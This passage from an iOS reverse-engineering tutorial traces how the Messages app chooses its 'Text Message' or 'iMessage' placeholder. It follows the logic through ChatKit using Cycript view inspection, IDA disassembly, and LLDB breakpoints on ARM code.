you’ ve already guessed the answer: “Text Message”  isn’t in keyWindow. For verification, let ’s 
see how many windows are there in the current view: 
cy# [UIApp windows] 
@[#"<UIWindow: 0x1575ca10; frame = (0 0; 320 568); gestureRecognizers = <NSArray: 
0x15629c60>;  layer = <UIWindowLayer:  0x156e36f0>>",#"<UITextEffectsWindow:  0x1579ab70;  
frame = (0 0; 320 568); opaque = NO; autoresize  = W+H; gestureRecognizers  = <NSArray:  
0x1579b300>;  layer = <UIWindowLayer:  0x1579adf0>>",#"<CKJoystickWindow:  0x1552bf90;  
baseClass  = UIAutoRotatingWindow;  frame = (0 0; 320 568); hidden = YES; 
gestureRecognizers  = <NSArray:  0x1552b730>;  layer = <UIWindowLa yer: 
0x1552bdc0>>",#"<UITextEffectsWindow:  0x1683a2e0;  frame = (0 0; 320 568); hidden = YES; 
gestureRecognizers  = <NSArray:  0x1688b9e0>;  layer = <UIWindowLayer:  0x168b9ad0>>"]  
As we can see, each item starting with “ #” is a window, there are 4 of them, and the 1st is 
keyWindow. Well, which one contains “Text Message” ? As the names suggest, the 2nd and 4th 
windows with the keyword “Text”  in their names may be our targets. However, the 4th 

 
350 window is even invisible because  of its hidden property. This leaves us with the 2nd window 
only, let ’s test it out in Cycript.  
cy# [#0x1579ab70  setHidden:YES]  
After this command, not only the input box but also the whole keyboard are hidden, as 
shown in figure 10 -5: 
 
Figure 10-  5 The bottom half is hidden  
Now we can confirm that “Text Message”  is located right in this window. Keep looking for 
it using Cycript. 
cy# [#0x1579ab70  setHidden:NO]  
cy# [#0x1579ab70  subviews]  
@[#"<UIInputSetContainerView:  0x1551fb10;  frame = (0 0; 320 568); autoresize  = W+H; 
layer = <CALayer:  0x1551f950>>"]  
cy# [#0x1551fb10  subviews]  
@[#"<UIInputSetHostView:  0x1551f5e0;  frame = (0 250; 320 318); layer = <CALayer:  
0x1551f480>>"]  
cy# [#0x1551f5e0  subviews]  
@[#"<UIKBInputBackdropView:  0x16827620;  frame = (0 65; 320 253); userInteractionEnabled  
= NO; layer = <CALayer:  0x1681c3f0>>",#"<_UIKBCompatInputView:  0x157b88d0;  frame = (0 
65; 320 253); layer = <CALayer:  0x157b8a10>>",#"<CKMessageEntryView:  0x1682ca50;  frame = 
(0 0; 320 65); opaque = NO; autoresize  = W; layer = <CALayer:  0x168ec520>>"]  
There are 3 subviews in the above code, which one does “Text Message”  reside? Let ’s test 
them one by one.  
cy# [#0x16827620  setHidden:YES]  
After the above command, the view looks like figure 10 -6, indicating that this view is just 

 
351 keyboard background. 
 
Figure 10-  6 Keyboard background is hidden  
cy# [#0x16827620 setHidden:NO] 
cy# [#0x157b88d0 setHidden:YES] 
After these 2 commands, the view changes to figure 10 -7. 

 
352  
Figure 10-  7 Keyboard is hidden  
OK, this view is keyboard itself. Thus, we can infer that UIKBInputBackdropView and 
UIKBCompatInputView work together to form a keyboard ’s view. This official design mode can 
be a good reference for  3rd-party keyboard developers and WinterBoard theme makers. 
Now that there is the last subview with an explicit name “CKMessageEntryView ”, waiting 
for our test:  
cy# [#0x157b88d0 setHidden:NO] 
cy# [#0x1682ca50 setHidden:YES] 
The view looks like figure 10-8 after the above commands.  

 
353  
Figure 10-  8 Message entry view is hidden  
According to the result, we know that “Text Message”  is inside CKMessageEntryView. Go 
on. 
cy# [#0x1682ca50  setHidden:NO]  
cy# [#0x1682ca50  subviews]  
@[#"<_UIBackdropView:  0x168ce210;  frame = (0 0; 320 65); opaque = NO; autoresize  = W+H; 
userInteractionEnabled  = NO; layer = <_UIBackdropViewLayer:  0x168f5300>>",#"<UIView:  
0x168d2b70;  frame = (0 0; 320 0.5); layer = <CALayer:  0x168d2be0>>",#"<UIButton:  
0x1684b240;  frame = (266 27; 53 33); opaque = NO; layer = <CALayer:  
0x168d64b0>>",#"<UIButton:  0x168b88b0;  frame = (266 30; 53 26); hidden = YES; opaque = 
NO; gestureRecognizers  = <NSArray:  0x16840030>;  layer = <CALayer:  
0x16858420>>",#"<UIButton:  0x16833ac0;  frame = (15 33.5; 25 18.5); opaque = NO; 
gestureRecognizers  = <NSArray:  0x1682d9b0>;  layer = <CALayer:  
0x16838780>>",#"<_UITextFieldRoundedRectBackgroundViewNeue:  0x168fba00;  frame = (55 8; 
209.5 49.5); opaque = NO; userInteractionEnabled  = NO; layer = <CALayer:  
0x1682da50>>",#"<UIView:  0x168dcf10;  frame = (55 8; 209.5 49.5); clipsToBounds  = YES; 
opaque = NO; layer = <CALayer:  0x168e4170>>",#"<CKMessageEntryWaveformView:  0x1571b710;  
frame = (15 25.5; 251 35); alpha = 0; opaque = NO; userInteractionEnabled  = NO; layer = 
<CALayer:  0x1578fc 90>>"] 
Again, let ’s hide these views one by one to locate “Text Message” , and I ’ll leave the work to 
you as an exercise. After locating “UIView: 0x168dcf10”  (Notice, it’ s the 2nd UIView object) as 
the target, let’ s continue with its subviews.  
cy# [#0x168d cf10 subviews]  
@[#"<CKMessageEntryContentView:  0x16389000;  baseClass  = UIScrollView;  frame = (3 -4; 
203.5 57.5); clipsToBounds  = YES; opaque = NO; gestureRecognizers  = <NSArray:  
0x168f0730>;  layer = <CALayer:  0x168e41a0>;  contentOffset:  {0, 0}; contentSize : {203.5, 
57}>"] 
There is only one subview, keep digging.  

 
354 cy# [#0x16389000  subviews]  
@[#"<CKMessageEntryRichTextView:  0x16295200;  baseClass  = UITextView;  frame = (0 20.5; 
203.5 36.5); text = ''; clipsToBounds  = YES; opaque = NO; gestureRecognizers  = <NSArray:  
0x168f5a60>;  layer = <CALayer:  0x168f59c0>;  contentOffset:  {0, 0}; contentSize:  {203.5, 
36.5}>",#"<CKMessageEntryTextView:  0x15ad2a00;  baseClass  = UITextView;  frame = (0 0; 
203.5 36.5); text = ''; clipsToBounds  = YES; opaque = NO; gestureRecognize rs = <NSArray:  
0x1578e600>;  layer = <CALayer:  0x157dcff0>;  contentOffset:  {0, 0}; contentSize:  {203.5, 
36.5}>",#"<UIView:  0x157e9160;  frame = (5 28; 193.5 0.5); layer = <CALayer:  
0x15733bd0>>",#"<UIImageView:  0x157308d0;  frame = (-0.5 55; 204 2.5); alpha = 0; opaque 
= NO; autoresize  = TM; userInteractionEnabled  = NO; layer = <CALayer:  
0x15730950>>",#"<UIImageView:  0x157ef530;  frame = (201 0; 2.5 57.5); alpha = 0; opaque = 
NO; autoresize  = LM; userInteractionEnabled  = NO; layer = <CALayer:  0x157ef5b0>>"]  
By hiding these views one by one, we can find that when executing “[#0x16295200 
setHidden:YES] ”, only “Text Message”  is hidden, other control objects are not affected, as 
shown in figure 10 -9. 
 
Figure 10-  9 placeholder is hidden  
It means that CKMessageEntryRichTextView is our target view. Open 
CKMessageEntryRichTextView.h and see if there ’s any “placeholder ”, as shown in figure 10 -10. 

 
355  
Figure 10-  10 CKMessageEntryRichTextView.h  
Unluckily, we cannot find placeholder in CKMessageEntryRichTextVie w.h. Was there 
something wrong in our deduction? Not really. Let ’s have a look at its superclass, i.e. 
CKMessageEntryTextView, as shown in figure 10 -11. 
 
Figure 10-  11 CKMessageEntryTextView.h  
Aha, there are lots of placeholders in this file. Among them p laceholderLabel and 
placeholderText are quite noticeable, is anyone of them our target placeholder? Let ’s verify with 
Cycript: 
cy# [#0x16295200  setPlaceholderText:@"iOSRE"]  

 
356 Now, the view looks like figure 10 -12. 
 
Figure 10-  12 Change placeholder to “iOSRE ” 
Great! placeholderText is exactly the placeholder we ’re looking for. To avoid confusion, 
hereafter we will refer to placeholder as placeholderText. So far, we have taken the first step in a 
long march. Well done!  
10.2.3   Find the 1st data source of placeholderText using  IDA and LLDB  
placeholderText is a property. To modify a property, our first reaction is to use its setter. 
We have already changed placeholderText from “Text Message”  to “iOSRE”  by calling 
setPlaceholderText:, does MobileSMS  also call this setter to change placeholderText? To verify 
our guesses, we need the help of IDA and LLDB.  
Since CKMessageEntryTextView comes from ChatKit, our next focus should turn to 
framework ChatKit in process MobileSMS, can you get it? OK, drag and d rop ChatKit into IDA. 
After the initial analysis, locate to [CKMessageEntryTextView setPlaceholderText:], as shown in 
figure 10- 13. 

 
357  
Figure 10-  13 [CKMessageEntryTextView setPlaceholderText:]  
Attach LLDB to MobileSMS and continue the process as follows:  
(lldb) process connect connect://iOSIP:1234 
Process 200596 stopped 
* thread #1: tid = 0x30f94,  0x316554f0  libsystem_kernel.dylib`mach_msg_trap  + 20, queue 
= 'com.apple.main -thread, stop reason = signal SIGSTOP 
    frame #0: 0x316554f0  libsystem_kernel.dyli b`mach_msg_trap  + 20 
libsystem_kernel.dylib`mach_msg_trap  + 20: 
-> 0x316554f0:   pop    {r4, r5, r6, r8} 
   0x316554f4:   bx     lr 
 
libsystem_kernel.dylib`mach_msg_overwrite_trap:  
   0x316554f8:   mov    r12, sp 
   0x316554fc:   push   {r4, r5, r6, r8} 
(lldb) c 
Process 200596 resuming  
Then check the ASLR offset of ChatKit as follows:  
(lldb) image list -o -f 
[  0] 0x00079000  
/private/var/db/stash/_.29LMeZ/Applications/MobileSMS.app/MobileSMS(0x000000000007d000)  
[  1] 0x0019c000  /Library/MobileSubstrate/MobileSubstrate.dylib(0x000000000019c000)  
[  2] 0x01eac000  /Users/snakeninny/Library/Developer/Xcode/iOS  DeviceSupport/8.1  
(12B411)/Symbols/System/Library/Frameworks/Foundation.framework/Foundation  
...... 
[  9] 0x01eac000  /Users/snaken inny/Library/Developer/Xcode/iOS  DeviceSupport/8.1  
(12B411)/Symbols/System/Library/PrivateFrameworks/ChatKit.framework/ChatKit  
The ASLR offset is 0x1eac000. With this offset, we can set a breakpoint on 
[CKMessageEntryTextView setPlaceholderText:] to check  whether it is called or not, and if it ’s 
called, who ’s the caller. The base address of this method is shown in figure 10 -14, as we can see, 
it’s 0x2693BCE0. 

 
358  
Figure 10-  14 [CKMessageEntryTextView setPlaceholderText:]  
So the breakpoint should be set at 0x1eac000 + 0x2693BCE0 = 0x287E7CE0.  
(lldb) br s -a 0x287E7CE0 
Breakpoint 1: where = ChatKit`- [CKMessageEntryTextView setPlaceholderText:], address = 
0x287e7ce0  
Next, let’ s change “bbs.iosre.com”  to “snakeninny@gmail.com ”, an email address that 
supports iMessage, to see if the process stops. As a result, we can find that while we ’re editing 
the address, the breakpoint is triggered multiple times, meaning [CKMessageEntryTextView 
setPlaceholderText:] has  been called a lot. Well, here comes a new question: among these calls, 
how can we know which one is the call that changes placeholderText from “Text Message”  to 
“iMessage” ? We can do a trick with LLDB ’s “com ” command:  
(lldb) br com add 1 
Enter your debugger command(s).  Type 'DONE' to end. 
> po $r2 
> p/x $lr 
> c 
> DONE 
This command is very straightforward; when the breakpoint gets triggered, LLDB prints the 
Objective -C description of R2, i.e. the only argument of setPlaceholderText:, then prints LR in 
hexadecimal, i.e. the return address of [CKMessageEntryTextView setPla ceholderText:]. If R2 is 
“iMessage” , it indicates that the argument is the 1st data source. Meanwhile, since LR is inside 
the caller, we can trace the 2nd data source from inside the caller. Clear the address entry and 
enter “snakeninny@gmail.com ”, then observe when LLDB prints “iMessage” : 
<object returned  empty description>  
(unsigned  int) $11 = 0x28768b33  
Process 200596 resuming  
Command #3 'c' continued  the target. 
<object returned  empty description>  
(unsigned  int) $13 = 0x28768b33  
Process 200596 resuming  
Command #3 'c' continued  the target. 
<object returned  empty description>  
(unsigned  int) $15 = 0x28768b33  
Process 200596 resuming  
Command #3 'c' continued  the target. 
Text Message 
(unsigned  int) $17 = 0x28768b33  
Process 200596 resuming  
Command #3 'c' continued  the target. 

 
359 iMessage  
(unsigned  int) $19 = 0x28768b33  
Process 200596 resuming  
Command #3 'c' continued  the target. 
As we can see, when placeholderText turns to “ iMessage” , LR’s value is 0x28768b33. 
0x28768b33 - 0x1eac000 = 0x268BCB33, let’ s jump to this address, as shown in figure 10 -15. 
 
Figure 10-  15 Jump to 0x268BCB33  
This address is located in ChatKit. OK, we ’ve found the 1st data source of placeholder, 
which is the argument of setPlaceholder:, as well got on the way to find the 2nd data source. 
What an uneventful achievement, meh.  
10.2.4   Find the Nth data source of placeholderText using  IDA and 
LLDB 
I don’ t know if you ’ve noticed that placeholderText was blank during address editing. Not 
until we ’ve pressed “return”  on the keyword that the placeholderText became “Text Message”  
or “iMessage” . In other words, iOS will not detect whether current address supports iMessage 
until editing is over; from the perspective of energy saving, this makes sense. Based on this 
design, we can firstly edit the recipient’ s address, then set a breakpoint and at last press “return”  
to finish editing. If the breakpoint gets triggered under such circumstance, we can say that 
MobileSMS is stopped during the process of detecting iMessage. Now, let ’s search upward from 
figure 10- 15 to see who is the caller of [CKMessageEntryTextView setPlaceholderText:], as 
shown in figure 10 -16. 
 
Figure 10-  16 Caller of [CKMessageEntryTextView setPlaceholderText:]  
Set placeholder text when updating entry view, this is rather reasonable. However, without 

 
360 any argument, how does [CKMessageEntryView updateEntryView] know whether it should set 
placeholderText to “Text Message”  or “iMessage” ? Judging from this, we can say  that 
[CKMessageEntryView updateEntryView] must have conducted some internal judges to get the 
conclusion that the address supports iMessage, hence changed the 2nd data source. Let ’s get 
back to IDA to see where the 2nd data source comes from, as shown in figure 10- 17. 
 
Figure 10-  17 Look for the 2nd data source  
R2 is the argument of setPlaceholderText:, which is also the 1st data source. And R2 comes 
from R5, therefore R5 is the 2nd data source. Where does R5 come from? There is a branch 
here, so let’ s take a look at its condition, as shown in figure 10 -18. 
 
Figure 10-  18 Branch condition  
We can see that the branch condition is “[$r0 recipientCount] ==  0”. The meaning of 
“recipient ” is very obvious that it represents the receiver of message. When the recipient count 
is 0, namely there ’s no recipient, MobileSMS will branch right, otherwise left. In the current 

 
361 case, because there is already one recipient, MobileSMS will probably branc h left. It’ s very 
simple to verify our assumption: input “snakeninny@gmail.com ” in the address entry, then set a 
breakpoint on any instruction in the right branch and at last press “ return”  to finish editing. We 
can see that the breakpoint is not triggered ; as a result, we can confirm that R5 comes from [$r8 
__ck_displayName] in the left branch. In other words,  [$r8 __ck_displayName] is the 3rd data 
source. Where does R8 come from? Scroll up in IDA, we can find that R8 is from [[self 
conversation] sendingS ervice] at the beginning of [CKMessageEntryView updateEntryView], as 
shown in figure 10 -19. 
 
Figure 10-  19 Look for 4th data source  
Therefore, [[self conversation] sendingService] is the 4th data source. Let ’s verify our 
analysis so far with LLDB: input “snakeninny@gmail.com ” in the address entry, then set a 
breakpoint on “MOV R8, R0 ” in figure 10- 19 and at last press “ return”  to finish editing. Execute 
“po [$r0 __ck_displayName] ” when the breakpoint gets triggered and then see whether LLDB 
outputs “ iMessa ge”: 
(lldb) br s -a 0x28768962 
Breakpoint  14: where = ChatKit` -[CKMessageEntryView  updateEntryView]  + 54, address = 
0x28768962  
(lldb) br com add 14 
Enter your debugger  command(s).   Type 'DONE' to end. 
> po [$r0 __ck_displayName]  
> c 
> DONE 
Text Message 
Process 200596 resuming  
Command #2 'c' continued  the target. 
iMessage  
Process 200596 resuming  
Command #2 'c' continued  the target. 
From the output, we know that the breakpoint has been triggered twice, and iMessage 

 
362 support was detected in the 2nd time. Si nce iMessage comes from  [[[self conversation] 
sendingService] __ck_displayName], what is the return value of [self conversation] and [[self 
conversation] sendingService]? No hurry, we will get to them one by one.  
Reinput the address and set 2 breakpoints on the first 2 objc_msgSends in 
[CKMessageEntryView updateEntry View] respectively. Then press “ return”  to trigger the 
breakpoints:  
Process 14235 stopped 
* thread #1: tid = 0x379b, 0x2b528948  ChatKit` -[CKMessageEntryView  updateEntryView]  + 
28, queue = 'com.apple.main -thread, stop reason = breakpoint  1.1 
    frame #0: 0x2b528948  ChatKit` -[CKMessageEntryView  updateEntryView]  + 28 
ChatKit` -[CKMessageEntryView  updateEntryView]  + 28: 
-> 0x2b528948:   blx    0x2b5f5f44                 ; symbol stub for: 
MarcoShouldLogMadridLevel$shim  
   0x2b52894c:   mov    r6, r0 
   0x2b52894e:   movw   r0, #51162 
   0x2b528952:   movt   r0, #2547 
(lldb) p (char *)$r1 
(char *) $6 = 0x2b60cc16  "conversation"  
(lldb) ni 
Process 14235 stopped 
* thread #1: tid = 0x379b, 0x2b52894c  ChatKit`-[CKMessageEntryView  updateEntryView]  + 
32, queue = 'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x2b52894c  ChatKit` -[CKMessageEntryView  updateEntryView]  + 32 
ChatKit` -[CKMessageEntryView  updateEntryView]  + 32: 
-> 0x2b52894 c:  mov    r6, r0 
   0x2b52894e:   movw   r0, #51162 
   0x2b528952:   movt   r0, #2547 
   0x2b528956:   add    r0, pc 
(lldb) po $r0 
CKPendingConversation<0x1587e870>{identifier:'(null)'   guid:'(null)'}(null)  
The return value of [self conversation] is a CKPendingConversation object. OK, now look at 
the next one: 
(lldb) c 
Process 14235 resuming  
Process 14235 stopped 
* thread #1: tid = 0x379b, 0x2b52895e  ChatKit` -[CKMessageEntryView  updateEntryView]  + 
50, queue = 'com.apple.main -thread, stop reason = breakpoint 2.1 
    frame #0: 0x2b52895e  ChatKit` -[CKMessageEntryView  updateEntryView]  + 50 
ChatKit` -[CKMessageEntryView  updateEntryView]  + 50: 
-> 0x2b52895e:   blx    0x2b5f5f44                 ; symbol stub for: 
MarcoShouldLogMadridLevel$shim  
   0x2b528962:   mov    r8, r0 
   0x2b528964:   movw   r0, #52792 
   0x2b528968:   movt   r0, #2547 
(lldb) p (char *)$r1 
(char *) $8 = 0x2b6105e1  "sendingService"  
(lldb) ni 
Process 14235 stopped 
* thread #1: tid = 0x379b, 0x2b528962  ChatKit` -[CKMessageEntryView  updateEntryView]  + 
54, queue = 'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x2b528962  ChatKit` -[CKMessageEntryView  updateEntryView]  + 54 
 
363 ChatKit` -[CKMessageEntryView  updateEntryView]  + 54: 
-> 0x2b528962:   mov    r8, r0 
   0x2b528964:   movw   r0, #52792 
   0x2b528968:   movt   r0, #2547 
   0x2b52896c:   add    r0, pc 
(lldb) po $r0 
IMService[SMS]  
(lldb) po [$r0 class] 
IMServiceImpl  
Obviously, the return value of [CKPendingConversation sendingService] is IMService[SMS] 
(the value becomes IMService[iMessage] when this breakpoint gets triggered the 2nd time), 
whose type is IMSerciceImpl. Therefore, the 4th data source is [CKPendingConversation 
sendingService]. Can you still follow?  
Till now, we have already got a lot of useful information. So let ’s turn back to IDA, locate 
[CKPendingConversation sendingService] and find out how it works internally, as shown in 
figure 10- 20. 
 
Figure 10-  20 [CKPendingConversation sendingService]  
The implementation logic is not too complicated. But there are several branches so that we 
can’t make sure which one MobileSMS actually goes. Debug again with LLDB and pay attention 
to every branch condition as well as the address of the next instruction.  
Process 14235 stopped 
* thread #1: tid = 0x379b, 0x2b5f0264  ChatKit` -[CKPendingConversation  sendingService],  
queue = 'com.apple.main -thread, stop reason = breakpoint  3.1 
    frame #0: 0x2b5f0264  ChatKit` -[CKPendingConversation  sendingService]  
ChatKit` -[CKPendingConversation  sendingService]:  
-> 0x2b5f0264 :  push   {r4, r5, r7, lr} 

 
364    0x2b5f0266:   add    r7, sp, #8 
   0x2b5f0268:   sub    sp, #8 
   0x2b5f026a:   mov    r4, r0 
(lldb) ni 
Process 14235 stopped 
...... 
* thread #1: tid = 0x379b, 0x2b5f027e  ChatKit` -[CKPendingConversation  sendingService]  + 
26, queue = 'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x2b5f027e  ChatKit` -[CKPendingConversation  sendingService]  + 26 
ChatKit` -[CKPendingConversation  sendingService]  + 26: 
-> 0x2b5f027e:   cbz    r0, 0x2b5f02a4             ; -[CKPendingCo nversation  
sendingService]  + 64 
   0x2b5f0280:   movw   r0, #38082 
   0x2b5f0284:   movt   r0, #2535 
   0x2b5f0288:   str    r4, [sp] 
(lldb) p $r0 
(unsigned  int) $11 = 0 
(lldb) ni 
Process 14235 stopped 
...... 
* thread #1: tid = 0x379b, 0x2b5f02b8  ChatKit` -[CKPendingConversation  sendingService]  + 
84, queue = 'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x2b5f02b8  ChatKit` -[CKPendingConversation  sendingService]  + 84 
ChatKit` -[CKPendingConversation  sendingService]  + 84: 
-> 0x2b5f02b8:   cbz    r0, 0x2b5f02c4             ; -[CKPendingConversation  
sendingService]  + 96 
   0x2b5f02ba:   mov    r0, r4 
   0x2b5f02bc:   mov    r1, r5 
   0x2b5f02be:   blx    0x2b5f5f44                 ; symbol stub for: 
MarcoShouldLogMadridLevel$shim  
(lldb) p $r0 
(unsigned  int) $12 = 341691792  
(lldb) ni 
Process 14235 stopped 
...... 
* thread #1: tid = 0x379b, 0x2b5f02c2  ChatKit` -[CKPendingConversation  sendingService]  + 
94, queue = 'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x2b5f02c2 ChatKit` -[CKPendingConversation  sendingService]  + 94 
ChatKit` -[CKPendingConversation  sendingService]  + 94: 
-> 0x2b5f02c2:   cbnz   r0, 0x2b5f032c             ; -[CKPendingConversation  
sendingService]  + 200 
   0x2b5f02c4:   movw   r0, #35464 
   0x2b5f02c8 :  movt   r0, #2535 
   0x2b5f02cc:   add    r0, pc 
(lldb) p $r0 
(unsigned  int) $13 = 341691792  
(lldb) ni 
Process 14235 stopped 
...... 
* thread #1: tid = 0x379b, 0x2b5f032e  ChatKit` -[CKPendingConversation  sendingService]  + 
202, queue = 'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x2b5f032e  ChatKit` -[CKPendingConversation  sendingService]  + 202 
ChatKit` -[CKPendingConversation  sendingService]  + 202: 
-> 0x2b5f032e:   pop    {r4, r5, r7, pc} 
 
ChatKit` -[CKPendingConversation  refreshStatus ForAddresses:withCompletionBlock:]:  
   0x2b5f0330:   push   {r4, r5, r6, r7, lr} 
   0x2b5f0332:   add    r7, sp, #12 
   0x2b5f0334:   push.w {r8, r10, r11} 
 
365 The execution flow of MobileSMS is very evident now. There are 3 conditional branches, 
which are CBZ, CBZ and CBNZ respectively. At each time, the value of R0 is 0, 341691792 and 
341691792 respectively. As a result, we can know that the execution flow is shown in figure 10 -
21. 
 
Figure 10-  21 Execution flow  
So the value of [CKPendingConversation sendingService] actually comes from 
[CKPendingConversation composeSendingService], which is the 5th data source, right? OK, let ’s 
proceed to the new method in IDA, as shown in figure 10 -22.  
 
Figure 10-  22 [CKPendingConversation composeSendingService]  
Obviously, [CKPendingConversation composeSendingService] merely returns the value of 

 
366 instance variable _composeSendingService. In other words, _composeSendingService is the 6th 
data source. In that case, we just need to find where this instance variable is wr itten and there 
comes the 7th data sources.  
Click _OBJC_IVAR_$_CKPendingConversation._composeSendingService to focus the 
cursor on it. Then press “x” to inspect xrefs to this variable, as shown in figure 10 -23. 
 
Figure 10-  23 Inspect cross references  
Here, we can find 2 methods explicitly accessing _composeSendingService, which happens 
to be one setter and one getter respectively. Naturally, we guess that _composeSendingService 
is a property. Open CKPendingConversation.h and verify our assumption, as s hown in figure 
10-24. 
 
Figure 10-  24 CKPendingConversation.h  
In Objective- C, write operation of a property is often carried out through its setter. Thus to 
find the 7th data source, we should set a breakpoint on [CKPendingConversation setComposeSendingService:] and check out who ’s the caller. Repeat our previous operations: 

 
367 reinput the address, set breakpoint at the beginning of [CKPendingConversation 
setComposeSendingService:], and then press “return”  to trigger the breakpoint:  
Process 30928 stopped 
* thread #1: tid = 0x78d0, 0x30b3665c  ChatKit` -[CKPendingConversation  
setComposeSendingService:],  queue = 'com.apple.main -thread, stop reason = breakpoint  1.1 
    frame #0: 0x30b3665c  ChatKit` -[CKPendingConversation  setComposeSendingService:]  
ChatKit` -[CKPendingConversation  setComposeSendingService:]:  
-> 0x30b3665c:   movw   r1, #41004 
   0x30b36660:   movt   r1, #2535 
   0x30b36664:   add    r1, pc 
   0x30b36666:   ldr    r1, [r1] 
(lldb) p/x $lr 
(unsigned  int) $0 = 0x30b3656d  
By subtracting ASLR offset of ChatKit from LR here, we get 0x2698456D, which is LR 
without offset. Then jump to this address in IDA, as shown in figure 10 -25. 
 
Figure 10-  25 Jump to 0x2698456D  
The argument of [CKPendingConversation setComposeSendingService:], i.e. R2, is the 7th 
data source. R2 comes from R6, therefore R6 is the 8th data source. Search upwards to find R6 ’s 
source, as shown in figure 10 -26. 
 
Figure 10-  26 Look for the 9th data source  
R6 is from R1, so R1 is the 9th data source. And where does R1 come from? Since we are  
inside sub_26984530 and R1 is read without being written, so R1 comes from the caller of 
sub_26984530, right? Let’ s take a look at the cross references to sub_26984530 to look for its 
possible callers, as shown in figure 10 -27. 

 
368  
Figure 10-  27 Inspect cro ss references  
Refresh sending service? This name is very informative. Let ’s head directly to 
[CKPendingConversation refreshComposeSendingServiceForAddresses:withCompletionBlock:] 
as shown in figure 10 -28 for more details. In this method, sub_26984530 is ob viously the 2nd 
argument of refreshStatusForAddresses:withCompletionBlock:, namely the completionBlock, as shown in figure 10 -28. 
 
Figure 10 - 28 [CKPendingConversation refreshComposeSendingServiceForAddresses:withCompletionBlock:]  
Although sub_26984530 appears in this method, it just acts as an argument of 
objc_msgSend, hence is not called directly. Well, who is the direct caller on earth? Actually, 
we’ve already mastered the solution of such problems: reinput the address, set a breakpoint at 
the beginning of sub_26984530 and then press “return”  to trigger the breakpoint.  
Process 30928 stopped 
* thread #1: tid = 0x78d0, 0x30b36530  ChatKit`__86 -[CKPending Conversation  
refreshComposeSendingServiceForAddresses:withCompletionBlock:]_block_invoke,  queue = 
'com.apple.main -thread, stop reason = breakpoint  6.1 
    frame #0: 0x30b36530  ChatKit`__86 -[CKPendingConversation  
refreshComposeSendingServiceForAddresses:wit hCompletionBlock:]_block_invoke  
ChatKit`__86 -[CKPendingConversation  
refreshComposeSendingServiceForAddresses:withCompletionBlock:]_block_invoke:  
-> 0x30b36530:   push   {r4, r5, r6, r7, lr} 
   0x30b36532:   add    r7, sp, #12 
   0x30b36534:   push.w {r8, r10} 
   0x30b36538:   sub    sp, #4 
(lldb) p/x $lr 
(unsigned  int) $38 = 0x30b364bb  
LR without offset is 0x30b364bb - 0xa1b2000 = 0x269844BB. Locate it in IDA, as shown in 
figure 10- 29. 

 
369  
Figure 10-  29 Caller of sub_26984530  
As we can see, sub_26984530 isn ’t called explicitly. Instead, its address is stored in R6 to 
where the execution flow jumps, and then sub_26984530 is called implicitly. As a result, the 9th 
data source comes from sub_26984444. Well done! We have achieved a lot so far. Let ’s keep 
searching for the occurrences of the 9th data source, as shown in figure 10 -30. 
 
Figure 10-  30 Look for the 9th data source  
There are several branches inside this subroutine to determine whether it should assign 
[IMServiceImpl smsService] or [IMServiceImpl iMessage Service] to R1. Let ’s figure out the 
branch conditions, starting from figure 10 -31. 

 
370  
Figure 10-  31 Look for the 10th data source  
If the value of R0 is 2, [IMServiceImpl iMessageService] is the 10th data source, otherwise 
we have to further check the value  of R1. If R1 is 0, then [IMServiceImpl smsService] is the 10th 
datasouce, otherwise it should be [IMServiceImpl iMessageService]. The logic can be shown 
with the following pseudo code:  
- (BOOL)supportIMessage  
{ 
 if (R0 == 2 || R1 != 0) return YES; 
 return NO; 
} 
That is to say, the value of the 10th data source is determined by the combination of R0 and 
R1, both of whom assume the responsibility of being the 11th data source, hereafter referred to 
as 11th data source A and 11th data source B respectively. At the same time, the above pseudo 
code can also be written as the following:  
- (BOOL)supportIMessage  
{ 
 if (11thDataSourceA  == 2 || 11thDataSourceB  != 0) return YES; 
 return NO; 
} 
Get back to figure 10 -31 to trace the 11th data source; R0 comes from "UXT B.W R0, R8". 

 
371  
Figure 10-  32 UXTB 
According to the ARM official document in figure 10 -32, UXTB is used to zero extend the 8 -
bit value in R8 to a 32 -bit value and then put it into R0, who is a 32 -bit register. In other words, 
R0 comes from R8, so R8 is the 12th data source A; and from the facts that arg_0 = 0x8, R8 = 
*(R7 + arg_0) = *(R7 + 0x8), R7 = SP + 0xC, we can know that R8 = *(SP + 0x14), which 
means *(SP + 0x14) is the 13th data source A. Well, where does *(SP + 0x14) come from? It 
definitively doesn ’t come from nowhere, so before “LDR.W R8, [R7,#8] ”, there must be an 
instruction writing something into *(SP + 0x14), right? That instruction is where the 14th data source A resides. As a result, we have to trace back to the instruction that writes to *(SP + 0x14). 
Although the idea sounds straightforward, things are much harder than you think. The 
reason is that SP, unlike those rarely used registers, is affected by lots of instructions. Say, push 
and pop both change the value of SP, so *(SP + 0x14) ma y appears in the form of *(SP ’ + offset) 
in other instructions due to the change of SP. And what ’s even worse is that the value of offset is 
undetermined yet. Sounds like we ’re getting into troubles! From now on, we have to find every 
single operation that  writes into *(SP ’ + offset) before “LDR.W R8, [R7,#8] ”, and then check 
whether (SP + 0x14) equals to (SP ’ + offset). Thanks to the frequent and irregular changes of SP, 
the following section is the hardest part of this book. So please stay very close! Let ’s start from 
“LDR.W R8, [R7,#8] ” and trace back every single operation that writes into *(SP ’ + offset) for 
now.  
In sub_26984444, the first 4 instructions before “LDR.W R8, [R7,#8] ” are all SP related. We 
use SP1~SP4 to mark the values of SP before the execution of the current instruction, as shown 

 
372 in figure 10- 33. 
 
Figure 10-  33 Mark different SPs  
Before and after the execution of “PUSH {R4- R7,LR} ”, the values of SP are SP1 and SP2  
respectively, can you understand? Next, we will try to deduce how SP changes instruction by 
instruction. 
“PUSH {R4- R7,LR} ” pushes 5 registers, i.e. R4, R5, R6, R7 and LR into stack. Every register 
is 32 -bit i.e. 4 bytes. Since the ARM stack is full descen ding, therefore SP2 = SP1 - 5 * 0x4 = SP1 -  
0x14. “ADD R7, SP,  #0xC”  is equivalent to R7 = SP2 + 0xC, which has no influence  on SP. The 
value of var_10 in “ STR.W R8, [SP,#0xC+var_10]! ” is -0x10, so this instruction equals to 
“STR.W R8, [SP,# -4]”, i.e. *(SP2 - 0x4) = R8 and this instruction doesn ’t have impact on SP 
either. “ SUB SP, SP, #4 ” equals to SP3 = SP2 - 0x4. According to our marking rules, 13th data 
